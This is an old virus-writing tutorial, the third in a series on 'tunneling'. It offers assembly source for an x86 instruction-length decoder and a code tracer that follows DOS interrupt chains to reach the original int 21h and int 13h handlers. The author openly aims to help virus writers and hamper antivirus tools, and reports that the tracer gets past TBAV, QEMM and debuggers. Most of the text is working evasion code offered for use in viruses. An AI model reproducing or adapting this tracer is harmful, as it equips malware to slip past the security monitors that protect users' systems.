Tutorials - Tunneling Via Mini-Tunnelers

    .-----------.
    | The curse |
    '-----------'
    This document has been sealed by an evil, ancient Egyptian curse... anyone
reading this text may have their flesh liquefy and drip off their bones.  Hey,
don't let some bothersome flesh-dripping stop you from reading this document,
the curse only applies if you haven't read the first two documents in my series
on tunneling, the ones before this one, which is the third.  Of course, if you
-HAVEN'T- read the first two, which cover single stepping and code tracing...
well then... you better get reading, don't you think?

    .--------------.
    | Introduction |
    '--------------'
    So, you think you are an ace, and you are beginning to wonder what this
third document could possibly be about, since you think you know everything
there is to know about tunneling already.  As if single stepping and the
primitive form of code tracer I taught you to code... is all there is in the
world of tunneling.

    Yes human, it is time to face the facts, you are only halfway along the
road of tunneling genius, and you need to progress past your pathetic self
destructive existence as a human being, into the higher realm of
extraterrestrial intelligence.

    What can you learn from extraterrestrials?  How about a form of complex
mask table and decoder that compile to HALF THE SIZE OF THE OLD ONES, and can
-ALSO- be used in emulation systems?  How about a new code tracing engine that
actually works as well as being smaller than the old one, as WELL as using the
new CMT format as WELL as having commented source code that even -YOU- could
understand?!?!  How about i2a trapping, i20 and CP/M exploitation, and kernel
scanning?  All those and more await you in this document!

    In an effort to make the world of the virus writer a better place, and to
make the world of the AV a little tougher, I have struck up a deal with the
aliens which allows me to release these tunneling concepts to the general
public.  In trade, I've had to help them with the coding of code emulation
tunneling systems... mwahahaha.

-----------------------------------------------------------------------------
Section 1:  Complex Mask Tables v2.0
-----------------------------------------------------------------------------
    Yes, complex mask tables are back, and they, with the help of the higher
beings, are even better than before!  After having many talks with the aliens,
a new structure for CMT tables was created, as well as a new format for the CMT
entries themselves.  We also created a new CMT decoder system, and increased
the functionality of the CMT system to allow rudimentary handling of emulation
systems!

    However, before we go into the new CMT format, there's something you need
to know.  Do you remember my code tracer from document #2... which never seemed
to work on anyone's system except mine, and even then, not very often?  Well, I
can now tell you that this was NOT a problem with code tracing, it was simply
because of bugs in the CMT's!!!!

    That's right, you can throw the old version of CMT's out of the window, the
old example tables I created are absolutely useless, chock full of bugs so
chumpy you could carve them.  Of course, I didn't realise this until I began
work on beta copies of 8086 emulation systems... which led to the creation of
the new form of CMT's you're about to see.  Basically, although the old CMT
design was good in theory, the example tables you saw (the big list of 1's and
0's) were all wrong.

    How can I say that these typographical errors won't crop up again?  Well, I
can't.  However, I -CAN- tell you that the new CMT 2.0 format reduces the risk
of errors such as the ones I made... but it comes with a lot of other features
as well that make them superior to the old format... which you'll learn about
as we go along.  Anyway, enough self-congratulatory text... here's the design
structure of the new CMT 2.0 format.

-------------------------------------------------------------------------------
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

    Layout of table entry:   Size    Description
                            '----'  '-----------'
                             byte    Field descriptor byte
                             byte    MASK
                             word    Handling routine if needed
                             byte    CMP value

    Field descriptor byte:   |x|6|5|4|3|2|1|0|
                             | | | | | |     |
                             '-'-'-'-'-'-----'
                                | | | |   '----------------.
                                | | | |                    ^
                                | | | |   Length of instruction OR the number
                                | | | |   to add to instruction length after
             .------------------' | | |   the other decodings
             ^                    | | '--------------------.
  0 = Don't use last bitfields    | |                      ^
  1 = Use last bitfields          | |     0 = Don't use MODR/M routines
                                  | |     1 = Use MODR/M routines
             .--------------------' '----------------------.
             ^                                             ^
  0 = Last bitfields are xxxxxxxX            0 = Opcode is not special
  1 = Last bitfields are xxxxxxXX            1 = Opcode needs special handler

|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
-------------------------------------------------------------------------------
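
    To make the bit layout above concrete, here is a minimal sketch that splits
a field descriptor byte into its parts.  It is written in Python purely as a
neutral notation; it is not part of the original package, and the names
FieldDescriptor, parse_descriptor and entry_size are made up for illustration.
The bit positions follow the diagram (bit 6 = use last bitfields, bit 5 = last
bitfields are two bits wide, bit 4 = special handler, bit 3 = MODR/M, bits 2-0
= length).

```python
from typing import NamedTuple


class FieldDescriptor(NamedTuple):
    """Hypothetical container for the fields of a CMT 2.0 descriptor byte."""
    use_last_bits: bool   # bit 6: opcode's low bit(s) select immediate size
    two_bit_field: bool   # bit 5: the selector is the low TWO opcode bits
    special: bool         # bit 4: entry carries a handler address (word)
    uses_modrm: bool      # bit 3: run the MODR/M length phase
    base_length: int      # bits 2..0: fixed length / amount to add


def parse_descriptor(value: int) -> FieldDescriptor:
    """Split a descriptor byte into its fields, as laid out in the diagram."""
    return FieldDescriptor(
        use_last_bits=bool(value & 0b01000000),
        two_bit_field=bool(value & 0b00100000),
        special=bool(value & 0b00010000),
        uses_modrm=bool(value & 0b00001000),
        base_length=value & 0b00000111,
    )


def entry_size(value: int) -> int:
    """Size in bytes of a table entry: descriptor + MASK + CMP value,
    plus a handler word when the special flag is set."""
    return 5 if parse_descriptor(value).special else 3
```

    For example, parse_descriptor(0b00010010) describes a 2 byte instruction
that needs a special handler, so its table entry takes 5 bytes instead of 3.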

    Those are the new design specifications... they look a little daunting at
first but you'll get used to them :)  They are actually so much easier to use
than the CMT 1.0 format.  Anyway, before I go into how these tables operate,
I'll discuss what some of the major changes between CMT formats 1.0 and 2.0
are, and why I made them.

    First of all, in the CMT 1.0 format, it was annoying to me that the decoder
needed to handle two different types of table entry, word sized and byte sized,
making the decoder twice the size it should have been.  As such, I took out the
word size entries for the CMT 2.0 format.  Also, the new CMT 2.0 format doesn't
have to handle multiple CMP values per MASK... which also decreases decoder
size and complexity greatly.

    Finally, the biggest change was how the CMT method actually works.  Before,
you had to pre-calculate the length of every variation of instruction... which
would lead to hard-to-track-down bugs when you typed a 1 instead of a 0 in the
tables by accident.  To combat this, in the new CMT 2.0 format, the decoder
actually calculates the length of instructions on the fly!  Of course you still
have to enter opcode information, but what's needed now is nothing compared to
what was needed before.

    Opcode length can generally be determined by putting an opcode through 4
phases, each of which adds to the total opcode length along the way.  However,
each opcode only has to go through a certain combination of phases, hence the
table entries, which tell the decoder which phases the opcode needs to go
through to calculate the full instruction length.

    The first 2 phases are for special opcodes with immediate data following
them.  These opcodes specify whether the immediate data following is a byte or
word by using the last bit of their opcode... if it is clear, then immediate
byte data follows, and if it is set, immediate word data follows.  Some
instructions use the last TWO bits to specify immediate data length instead,
and handling these is the second phase of the decoder.  Which of these phases,
if any, an opcode needs to go through is marked by bits 6 and 5 of the field
descriptor byte.  For the two-bit form, the bit/data ratios are as follows:

        00 = byte immediate follows instruction
        01 = word immediate follows instruction
        10 = byte immediate follows instruction
        11 = byte immediate follows instruction
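
    The two immediate-data phases can be sketched as a single small function.
This is only an illustration in Python (the name immediate_size is invented
here); it mirrors what the decoder listing does: take the low opcode bit plus
one, then knock one byte back off when the two-bit form is in use and both low
bits are set.

```python
def immediate_size(opcode: int, two_bit_field: bool) -> int:
    """Bytes of immediate data implied by the low bit(s) of the opcode.

    two_bit_field corresponds to bit 5 of the field descriptor byte.
    """
    size = (opcode & 1) + 1              # low bit clear -> byte, set -> word
    if two_bit_field and (opcode & 0b11) == 0b11:
        size -= 1                        # 11 means a byte immediate after all
    return size
```

    With the two-bit form, opcodes 80h, 81h, 82h and 83h give 1, 2, 1 and 1
bytes of immediate data, which matches the list above.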

    The third decoder phase is MODR/M handling.  Many opcodes are in a set
structure called the MODR/M format.  These instructions can have part of their
length determined by the same MODR/M routine.  If bit 3 is set in the
field descriptor byte, the CMT decoder passes the opcode through its MODR/M
handler to calculate part of the instruction length.
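
    As a rough sketch of what a MODR/M length routine has to do for 16-bit
addressing (Python used only as notation, and the name modrm_length is an
assumption, not something from the original source): the opcode byte and the
MODR/M byte always count for 2, and the MOD field then decides how many
displacement bytes follow.

```python
def modrm_length(modrm: int) -> int:
    """Length of opcode byte + MODR/M byte + displacement (16-bit addressing)."""
    mod = modrm >> 6          # top two bits
    rm = modrm & 0b111        # bottom three bits
    length = 2                # opcode byte plus the MODR/M byte itself
    if mod == 0b00 and rm == 0b110:
        length += 2           # direct memory address: 16-bit displacement
    elif mod == 0b01:
        length += 1           # 8-bit displacement
    elif mod == 0b10:
        length += 2           # 16-bit displacement
    # mod == 00 (other r/m values) and mod == 11 add nothing
    return length
```

    So a MODR/M byte of 06h (direct address) gives 4, 40h gives 3, and C0h
(register to register) gives 2.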

    The fourth decoder phase is the addition to the current instruction length
(as built up by the past 3 phases), of the number contained in the last 3 bits
of the field descriptor byte.  The reason for this is that sometimes,
instructions are a fixed length and don't need to go through any of the other 3
phases... so you just set the field descriptor byte to not go through any of
the phases and set the last 3 bits to the full instruction length.  Also, some
instructions need a constant number to be added to their length once other
decodings have been completed to get the full instruction length.  If an
instruction doesn't need any more values added to it, such as if it is just a
straight MODR/M instruction, the last 3 bits can be set to zero, nulling the
effect of the 4th phase.

    Oh, and there is one more thing I haven't mentioned yet... the special
opcode flag.  The special opcode flag was designed for usage in emulation
systems, however it can allow small space savings in code tracers as well.  As
you may remember from the code tracer in document #2, we had to strain off many
opcodes before they reached the CMT tables, using dedicated routines to handle
them.  Examples of these opcodes are segment override prefixes, JMP and CALL
instructions, etc.

    To do this, we generally had to mask the opcode and compare the result
against the signature of the opcode we are checking for, jumping to the special
handling routine if we get a match.  However, this is basically exactly what
CMT tables were designed for, masking and comparing.  With the new CMT 2.0
format, the decoder can return to you an address you need to call for special
opcodes, reducing the size of your code tracing engines as there is no longer a
need for long drawn out sets of PUSH/AND/CMP/POP/JE... this should also make
your source code a lot more readable.
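
    The mask-and-compare dispatch described above can be modelled in a few
lines.  This is a hedged sketch in Python, not the author's decoder: the table
holds four entries in the (descriptor, MASK, handler, CMP) order used by the
format, the handler names are just labels, and find_handler is an invented
name.

```python
# (field descriptor, MASK, handler label or None, CMP value)
TABLE = [
    (0b00010001, 0b11100111, "tracer_override",         0b00100110),
    (0b00010010, 0b11110000, "tracer_conditional_jump", 0b01110000),
    (0b00010010, 0b11111111, "tracer_jmp_short",        0b11101011),
    (0b00000001, 0b11111100, None,                      0b11111000),
]


def find_handler(opcode: int):
    """Return (matched, handler) for the first entry whose masked opcode
    equals its CMP value; handler is None for ordinary opcodes."""
    for _descriptor, mask, handler, cmp_value in TABLE:
        if (opcode & mask) == cmp_value:
            return True, handler
    return False, None
```

    Here find_handler(0x2E) reports the segment override handler, while
find_handler(0xFA) matches an ordinary entry with no handler attached.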

    Are there any disadvantages in the new CMT 2.0 format?  Well, only one, in
that they -CANNOT- handle any 286 or higher opcodes.  This problem will be
handled in the CMT 3.0 definition, which is currently in the works for a later
document.  Until document #4 when the CMT 3.0 definition is released, this
table definition should last you for quite a while.  Time to see the CMT 2.0
instruction database.

-------------------------------------------------------------------------------
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

instruction_struc struc

    ; AAA/AAS/DAA/DAS
    db 00000001b
    db 11100111b
    db 00100111b

    ; AAD/AAM
    db 00000010b
    db 11111110b
    db 11010100b

    ; BOUND
    db 00001000b
    db 11111111b
    db 01100010b

    ; CBW/CWD/POPF/PUSHF/SAHF/LAHF/WAIT/CALL FAR OFF:SEG
    ; XCHG accumulator with register
    db 00000001b
    db 11110000b
    db 10010000b

    ; CLD/STD/CMC/HLT
    db 00000001b
    db 11110110b
    db 11110100b

    ; CLI/STI/CLC/STC
    db 00000001b
    db 11111100b
    db 11111000b

    ; CS/DS/ES/SS overrides
    db 00010001b
    db 11100111b
    dw tracer_override
    db 00100110b

    ; JMP conditional
    db 00010010b
    db 11110000b
    dw tracer_conditional_jump
    db 01110000b

    ; JMP short
    db 00010010b
    db 11111111b
    dw tracer_jmp_short
    db 11101011b

    ; LOCK/REP[N[E]]
    db 00000001b
    db 11111100b
    db 11110000b

    ; CMPS/MOVS/LODS/SCAS
    db 00000001b
    db 11110100b
    db 10100100b

    ; DEC|INC|PUSH|POP register
    db 00000001b
    db 11100000b
    db 01000000b

    ; INT 3 | INTO
    db 00000001b
    db 11111101b
    db 11001100b

    ; IRET
    db 00010000b
    db 11111111b
    dw tracer_ret_far
    db 11001111b

    ; RETN|F
    db 00010000b
    db 11110110b
    dw tracer_ret_far
    db 11000010b

    ; INT variable
    db 00000010b
    db 11111111b
    db 11001101b

    ; PUSH|POP segment register
    db 00000001b
    db 11100110b
    db 00000110b

    ; ENTER
    db 00000100b
    db 11111111b
    db 11001000b

    ; LEAVE
    db 00000001b
    db 11111111b
    db 11001001b

    ; LOOP series and JCXZ
    db 00010010b
    db 11111100b
    dw tracer_jmp_short
    db 11100000b

    ; XCHG/TEST/LEA/POP register/memory
    ; MOV segment register with register/memory
    db 00001000b
    db 11110100b
    db 10000100b

    ; PUSHA and POPA
    db 00000001b
    db 11111110b
    db 01100000b

    ; IN/OUT variable port
    db 00000001b
    db 11111100b
    db 11101100b

    ; IN/OUT fixed port
    db 00000010b
    db 11111100b
    db 11100100b

    ; STOS
    db 00000001b
    db 11111110b
    db 10101010b

    ; XLAT
    db 00000001b
    db 11111111b
    db 11010111b

    ; ESC
    db 00001000b
    db 11111000b
    db 11011000b

    ; LDS/LES
    db 00001000b
    db 11111110b
    db 11000100b

    ; MOV register/memory with register
    db 00001000b
    db 11111100b
    db 10001000b

    ; MOV memory with accumulator
    db 00000011b
    db 11111100b
    db 10100000b

    ; MOV register with immediate byte
    db 00000010b
    db 11111000b
    db 10110000b

    ; MOV register with immediate word
    db 00000011b
    db 11111000b
    db 10111000b

    ; TEST accumulator with immediate
    db 01000001b
    db 11111110b
    db 10101000b

    ; ADC|ADD|AND|CMP|OR|SBB|SUB|XOR register/memory with register
    db 00001000b
    db 11000100b
    db 00000000b

    ; RCR|RCL|ROR|ROL|SHR|SHL|SAR|SAL register/memory with 1 or CL
    db 00001000b
    db 11111100b
    db 11010000b

    ; RCR|RCL|ROR|ROL|SHR|SHL|SAR|SAL register/memory with immediate
    db 00001001b
    db 11111110b
    db 11000000b

    ; ADC|ADD|AND|CMP|OR|SBB|SUB|XOR register/memory with immediate
    db 01101000b
    db 11111100b
    db 10000000b

    ; MOV register/memory with immediate
    db 01001000b
    db 11111110b
    db 11000110b

    ; ADC|ADD|AND|CMP|OR|SBB|SUB|XOR accumulator with immediate
    db 01000001b
    db 11000110b
    db 00000100b

; F6 - test, ???, not, neg, mul, imul, div, idiv  b's
; F7 - test, ???, not, neg, mul, imul, div, idiv  w's
; FE - inc, dec, callin, callif, jmpin, jmpif, push, ???
; FF - inc, dec, callin, callif, jmpin, jmpif, push, ???
; Note that the TEST instruction is handled incorrectly in here, but properly
; fixed up in the CMT decoder
;
    db 00011000b
    db 11110110b
    dw tracer_indirect
    db 11110110b

    end_of_table equ $
    ends

instruction_table instruction_struc <>
                            ; our new complex mask table

|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
-------------------------------------------------------------------------------

    As you can see, the database for the CMT 2.0 format looks a lot cleaner and
less cluttered than the ones presented in document #2 for the CMT 1.0 format.
But this cleaner look is not only pleasing to the eye, it has the added
advantage of being easier to read, so you can add entries and check for bugs a
lot more easily than in the CMT 1.0 database.  So, now that you have the
example table and formal definition, it is time to show you the new and
improved CMT 2.0 decoder!
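
    One cheap way to check a table entry for typos is to list every opcode byte
that a MASK/CMP pair actually matches.  The following is only a sketch (Python
as notation; matching_opcodes and entry_is_reachable are made-up helper names),
but it catches the classic mistake of a CMP value with a bit set outside its
MASK, which can never match anything.

```python
def matching_opcodes(mask: int, cmp_value: int) -> list:
    """All opcode bytes for which (opcode AND mask) equals cmp_value."""
    return [op for op in range(256) if (op & mask) == cmp_value]


def entry_is_reachable(mask: int, cmp_value: int) -> bool:
    """False when cmp_value has bits set that the mask always clears."""
    return (cmp_value & ~mask & 0xFF) == 0
```

    For instance, the AAA/AAS/DAA/DAS entry (MASK 11100111b, CMP 00100111b)
matches exactly 27h, 2Fh, 37h and 3Fh.  The same check shows that the
90h-9Fh entry also covers 9Ah (CALL FAR) with a length of 1, which is only
safe because the tracer handles 9Ah itself before calling the decoder.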

-------------------------------------------------------------------------------
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

; Registers modified: AX, BX, CX, DX, SI, BP
; Requires:           AX holds opcode to scan through table
;                     Segment of CMT database in DS
; Returns on failure: BL=1
; Returns on success: BL=0
;                     AX=instruction length
;                     BP=address to give control to if dedicated routine
;                        needed, or 0 if no dedicated routine needed
;
decoder proc near
        lea si, [instruction_table-1]
        mov dx, ax                      ; DX holds the virgin opcode through
                                        ; the entire routine
decoder_main:
        xor bp, bp
        inc si
        cmp si, offset instruction_table.end_of_table
        jne decoder_valid       ; make sure we don't go off past the
                                        ; end of the table
decoder_invalid:
        mov bl, 1                       ; BL = failure code
        ret                             ; exit decoder

decoder_valid:
        mov ax, dx                      ; reload AX with current opcode
        mov bl, ds:[si]                 ; get field descriptor byte in BL
        mov bh, bl                      ; make a copy
        and al, ds:[si+1]               ; mask opcode against table entry
        inc si
        inc si
        test bl, 10000b
        je decoder_not_special          ; no special routine needed
        mov bp, ds:[si]                 ; grab routine address
        inc si
        inc si                          ; adjust DS:SI pointer
decoder_not_special:
        cmp al, ds:[si]                 ; check masked opcode against CMP value
        jne decoder_main                ; no match, so restart with next entry

        ; there is a bug in my tables which makes it so you have to set a
        ; bit in the field descriptor byte if a TEST B/TEST W instruction is
        ; encountered
        mov ax, dx
        and ax, 11100011111110b
        cmp ax, 00000011110110b
        jne decoder_notest
        or bh, 1000000b

decoder_notest:
        ; now we need to work out the opcode length... using the status bits
        ; held in BH (our copy of the field descriptor byte, with the TEST
        ; fix-up applied)... note that CL holds the running instruction length
        ; throughout this section

        ; first we need the beginning length of the instruction
        mov al, bh
        and al, 111b
        mov cl, al                      ; this is added/used as instruction
                                        ; length no matter what the rest of the
                                        ; bitfields say

        ; next we handle the 'last bitfields' section
        mov al, bh
        and al, 1000000b
        jz decoder_nobits       ; we're not supposed to use the bits

        mov ax, dx                      ; get current opcode back
        and al, 1
        inc al
        add cl, al                      ; increase accordingly
        mov al, bh
        and al, 100000b
        jz decoder_nobits
        mov ax, dx                      ; get current opcode back
        and al, 11b
        cmp al, 11b
        jne decoder_nobits
        dec cl                          ; decrease accordingly

decoder_nobits:
        ; now that we have the beginning length, we check to see if this
        ; entry uses MODR/M
        mov al, bh
        and al, 1000b
        jz decoder_nomodrm

        ; if we do use MODR/M... the shit really hits the fan here
        add cl, 2                       ; we add 2 by default since the opcode
                                        ; is at least 2 bytes long (identifier
                                        ; plus MODR/M byte)
        mov ax, dx                      ; get current opcode back
        and ah, 11000111b
        cmp ah, 110b
        je decoder_add_two      ; we just add 2 for straight memory access
        and ah, 11000000b
        jz decoder_nomodrm      ; we add nothing
        cmp ah, 01000000b
        je decoder_add_one      ; we just add a byte displacement here
        cmp ah, 11000000b
        je decoder_nomodrm      ; we add nothing here either

decoder_add_two:
        inc cl
decoder_add_one:
        inc cl
decoder_nomodrm:
        mov ch, 0
        mov ax, cx                      ; AX = instruction length
        mov bl, 0                       ; BL = success
        ret                             ; leave decoder
decoder endp

|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
-------------------------------------------------------------------------------
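
    To see the whole length calculation in one place, here is a small model of
the decoder's logic over a handful of the table entries.  It is a sketch under
assumptions, written in Python only so the arithmetic is easy to follow: the
table is a six-entry subset, the handler word is reduced to a True/False flag,
and decode is an invented name.  The TEST fix-up for F6h/F7h is included
because the length of those two opcodes depends on the MODR/M byte.

```python
# (field descriptor, MASK, CMP value, needs special handler)
TABLE = [
    (0b00000001, 0b11110000, 0b10010000, False),  # 90h-9Fh, one byte
    (0b00010010, 0b11110000, 0b01110000, True),   # conditional jumps
    (0b00001000, 0b11111100, 0b10001000, False),  # MOV r/m with register
    (0b01101000, 0b11111100, 0b10000000, False),  # ALU r/m with immediate
    (0b01000001, 0b11111110, 0b10101000, False),  # TEST accumulator, immediate
    (0b00011000, 0b11110110, 0b11110110, True),   # F6/F7/FE/FF group
]


def decode(opcode: int, modrm: int = 0):
    """Return (length, special) for a known opcode, or None if no entry matches."""
    for descriptor, mask, cmp_value, special in TABLE:
        if (opcode & mask) != cmp_value:
            continue
        # TEST r/m,imm lives in F6/F7 with reg field 000 and carries an
        # immediate, so switch on the "use last bit" flag for it.
        if (opcode & 0xFE) == 0xF6 and (modrm & 0b00111000) == 0:
            descriptor |= 0b01000000
        length = descriptor & 0b111                  # fixed part
        if descriptor & 0b01000000:                  # immediate via low bit(s)
            length += (opcode & 1) + 1
            if descriptor & 0b00100000 and (opcode & 0b11) == 0b11:
                length -= 1
        if descriptor & 0b00001000:                  # MODR/M phase
            length += 2
            mod, rm = modrm >> 6, modrm & 0b111
            if mod == 0b00 and rm == 0b110:
                length += 2
            elif mod == 0b01:
                length += 1
            elif mod == 0b10:
                length += 2
        return length, special
    return None
```

    A few worked cases: decode(0x8B, 0x06) gives a length of 4 (opcode, MODR/M,
16-bit address), decode(0x83, 0xC3) gives 3 (byte immediate), and
decode(0xF6, 0x06) gives 5 once the TEST fix-up adds the immediate byte.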

    Once again, the new decoder is much more efficient than the last one, and
is also a lot smaller and easier to understand as well ;)  Of course, it also
has the advantage that it works with the CMT 2.0 format, hehehe, and being
easier to understand is probably just because I actually commented it and set
the source out nicely (well, compared to the CMT 1.0 decoder at least, heh).

    Anyway, being the bloodsucking assho... uuuh, I mean, inquisitive human
being that you are... you are probably wanting to see some results on how the
new tables work.  What better way to show you than with a new code tracer
module that you can test for yourself?  This new version takes full advantage
of the features of the CMT 2.0 format, while fixing up a few bugs in the old
decoder.

-------------------------------------------------------------------------------
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

override       db 02eh  ; current segment override
loop_counter   dw 0300h ; local abort counter
global_counter dw 0     ; global abort counter
temp_ip        dw 0     ; temporary storage for stack searching
temp_store     dw 0, 0  ; temporary storage for stack searching
stack_top      dw 0     ; do not POP past this point
stack_bottom   dw 0     ; do not PUSH past this point

tracer proc near
    push cs
    pop ds
    mov ds:[stack_top], sp          ; setup stack
    mov ax, offset program_end+40h  ; smaller than lea ax, [program_end+40h]
    mov ds:[stack_bottom], ax       ; assuming we're running from a COM file,
                                    ; we shouldn't push past this point
    mov ax, 03521h
    int 021h                ; get i21 address
    xchg bx, di             ; into ES:DI
    push ax
    push ax
    push ax                 ; fixup stack (push fake CALL)
tracer_begin:
    mov ds:[override], 02eh ; clear overrides
tracer_skip_prefix:
    xor si, si
    mov ax, es
    cmp ax, ds:[first_mcb]
    jb tracer_success       ; check for DOS segment
    dec ds:[loop_counter]
    jz tracer_ret_far       ; do another path if this path has led nowhere
    dec ds:[global_counter]
    jz tracer_error         ; exit if too many global passes
    cmp di, 0fff0h
    jb check_opcode         ; everything is okay, handle opcodes
tracer_ret_far:             ; do another path as this has gone too long
    mov ax, sp
    add ax, 6
    cmp ax, ds:[stack_top]
    jae tracer_error        ; make sure we don't pop too much off the stack
    pop di
    pop es
    pop ds:[loop_counter]
    jmp tracer_begin        ; do RETF and return to main handler

tracer_error:
    inc si
tracer_success:
    mov sp, ds:[stack_top]
    ret                     ; exit tunneler

tracer_override:
    mov bl, es:[di]
    mov ds:[override], bl
    add di, ax
    jmp tracer_skip_prefix  ; handles segment overrides

tracer_conditional_jump:
    mov ax, di
    inc ax
    inc ax
    call tracer_call_finish ; push address after conditional jump onto the
                            ; stack
tracer_jmp_short:
    mov al, es:[di+1]
    cbw
    add di, ax
    inc di
    inc di
    jmp tracer_begin        ; do jump short and return to trace

tracer_indirect:
    xchg ax, bx             ; save opcode length
    mov ax, es:[di]
    cmp al, 0feh
    jb tracer_not_indirect  ; make sure it's within the right range
    and ah, 11000111b
    mov cl, ah              ; save MODR/M information, if there is an indirect
                            ; reference then CX!=110
    cmp ds:[override], 2eh
    je tracer_indirect_next
    inc cx                  ; sets CX!=0 if a non-CS override encountered
tracer_indirect_next:
    mov ax, es:[di]
    and ah, 111000b
    cmp ah, 10000b
    je tracer_call_near_mem ; CALL [X]
    cmp ah, 11000b
    je tracer_call_far_mem  ; CALL FAR [X]
    cmp ah, 100000b
    je tracer_jmp_near_mem  ; JMP [X]
    cmp ah, 101000b
    je tracer_jmp_far_mem   ; JMP FAR [X]

tracer_not_indirect:
    xchg bx, ax             ; restore opcode length
    jmp generic_opcode      ; it's a normal opcode so handle it normally

check_opcode:
    mov ax, es:[di]
        ; although the following opcode checks could be in the CMT, it is
        ; smaller to handle them directly
    cmp al, 0e9h
    je tracer_jmp_near_immed    ; JMP WORD PTR X
    cmp al, 0eah
    je tracer_jmp_far_immed     ; JMP DWORD PTR X:X
    cmp al, 0e8h
    je tracer_call_near_immed   ; CALL WORD PTR X
    cmp al, 9ah
    je tracer_call_far_immed    ; CALL DWORD PTR X:X
    push si
    call decoder                ; get length of opcode in AX... destroys SI
    pop si                      ; which is why we save/restore it
    cmp bl, 1
    je _tracer_ret_far          ; follow another path if invalid opcode found
    cmp bp, 0
    je generic_opcode           ; handle like a normal opcode
    jmp bp                      ; use a dedicated procedure for this opcode
generic_opcode:
    add di, ax                  ; DI=DI+Opcode Length
    jmp tracer_begin            ; resume tracing

tracer_call_near_mem:
    call tracer_call_setup      ; make sure CALL doesn't overflow stack
    add ax, 4
    jc _tracer_ret_far
    call tracer_call_finish     ; push address after CALL onto stack
tracer_jmp_near_mem:
    cmp cl, 110b                ; exit if indirect memory access
    jne _tracer_ret_far
    mov di, es:[di+2]
    mov di, es:[di]
    jmp tracer_begin            ; resume tracing

tracer_call_far_mem:
    call tracer_call_setup      ; make sure CALL doesn't overflow stack
    add ax, 5
    jc _tracer_ret_far
    call tracer_call_finish     ; push address after CALL onto stack
tracer_jmp_far_mem:
    cmp cl, 110b                ; exit if indirect memory access
    jne _tracer_ret_far
    mov di, es:[di+2]
    mov ax, es:[di+2]
    mov di, es:[di]
    mov es, ax
    jmp tracer_begin            ; resume tracing

tracer_call_near_immed:
    call tracer_call_setup      ; make sure CALL doesn't overflow stack
    add ax, 3
    jc _tracer_ret_far
    call tracer_call_finish     ; push address after CALL onto stack
tracer_jmp_near_immed:
    add di, es:[di+1]
    add di, 3
    jmp tracer_begin            ; resume tracing

tracer_call_far_immed:
    call tracer_call_setup      ; make sure CALL doesn't overflow stack
    add ax, 5
    jc _tracer_ret_far
    call tracer_call_finish     ; push address after CALL onto stack
tracer_jmp_far_immed:
    mov ax, es:[di+3]
    mov di, es:[di+1]
    mov es, ax
    jmp tracer_begin            ; resume tracing

_tracer_ret_far:                ; so short jumps can
    jmp tracer_ret_far          ; jump to tracer_ret_far
_tracer_error:                  ; so short jumps can
    jmp tracer_error            ; jump to tracer_error

; if you are going to push 6 bytes (3 words: COUNTER, CS, IP) onto the stack,
; then this routine makes sure the stack doesn't overflow... if it would
; overflow, then the tracer aborts
tracer_call_setup:
    pop bx
    mov ax, sp
    sub ax, 6                   ; AX=what SP will be after push's
    cmp ax, ds:[stack_bottom]
    jbe _tracer_error           ; abort if stack goes past limits
    mov ax, di
    push bx
    ret

; this routine scans the stack for the address you are wanting to push onto
; it... if it is not on there, the routine adds it to the stack, otherwise
; it performs a RET FAR
tracer_call_finish:
    pop ds:[temp_ip]            ; keeps the stack clear
    mov ds:[temp_store], ax
    mov ds:[temp_store+2], es   ; save ES and AX which are modified in the
                                ; routine
    push ss
    pop es
    xchg bp, di                 ; save DI
    mov di, sp                  ; ES:DI == SS:SP
tracer_call_loop:
    mov ax, es:[di]
    cmp ax, ds:[temp_store]
    jne tracer_call_nomatch     ; jump if IP!=SS:[SP]
    mov ax, es:[di+2]
    cmp ax, ds:[temp_store+2]
    je _tracer_ret_far          ; do RET FAR if CS:IP==SS:[SP]
tracer_call_nomatch:
    add di, 6
    cmp di, ds:[stack_top]
    jb tracer_call_loop         ; loop until the stack is exhausted
tracer_call_exit:
    push ds:[loop_counter]      ; push loop counter onto stack
    mov ax, ds:[temp_store+2]
    push ax                     ; push CS onto stack
    push ds:[temp_store]        ; push IP onto stack
    push ds:[temp_ip]           ; set return IP on stack
    mov es, ax
    xchg bp, di                 ; restore ES:DI (CS:IP)
    ret                         ; return to caller
tracer endp

|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
-------------------------------------------------------------------------------

    So how well does it work?  Well, in theory, since it is using a practically
bug free instruction database, and since it can handle 186 instructions now, it
should have increased chances of tunneling interrupts properly, unless 286/386
opcodes are encountered, in which case it may sometimes go haywire, and
sometimes it will not be hampered at all.  In practice, on my system it can
tunnel i21 past combinations of QEMM/TBAV/DESQVIEW/TD/S-ICE, so at least for ME
it's stable.

    As for tunneling i13, well, I've got it to half work :)  Unlike the first
version in document #2, it can now tunnel i13 past SMARTDRV by skipping the 386
opcode path and taking another path with no such opcodes.  The original version
was supposed to do this as well, but didn't due to a bug :)  Even if the bug
wasn't there, it still wouldn't have worked due to the buggy CMT tables.  I
don't think Win95 uses SMARTDRV, so I suppose my bugfix is redundant anyway
since a lot of people run Win95 :)

    Although it will generally tunnel i13 okay on normal systems... DESQView
is a totally different pot of cheese.  Under DESQView, the tunneler hangs the
computer for about 6 seconds before returning an abort code.  The DESQView i13
code is a MESS of conditional jumps and calls, which is somehow screwing up
the internal logic of the code tracer.  Sigh.

    Also, you can use the code tracing engine to tunnel the i20 handler, which
eventually leads to the i21 handler.  The reason is that whatever program has
trapped i20 simply changes AX to 0000 and then chains to the i21 handler.
DESQView, TBAV, and even DOS itself do this.  HOWEVER, if TBAV or DESQView
isn't loaded, then DOS gets control first, and its i20-to-i21 conversion
procedure is a few bytes below/above the i21 procedure itself in the
DOS kernel... which means the code tracer will think the second it reaches the
DOS kernel, that it has found the i21 entrypoint, when it is a few instructions
away.  Sigh.  You can get around this by checking ES:DI each pass for the
signature of the DOS kernel entrypoint, (which is CLI/CMP/JZ/CMP/JZ/etc, you'll
read more about it through the document), instead of checking if the current
segment is below the first MCB.  Apart from that, the routine tunnels through
the TBAV/DESQView code properly every time, reaching the correct i21 address.

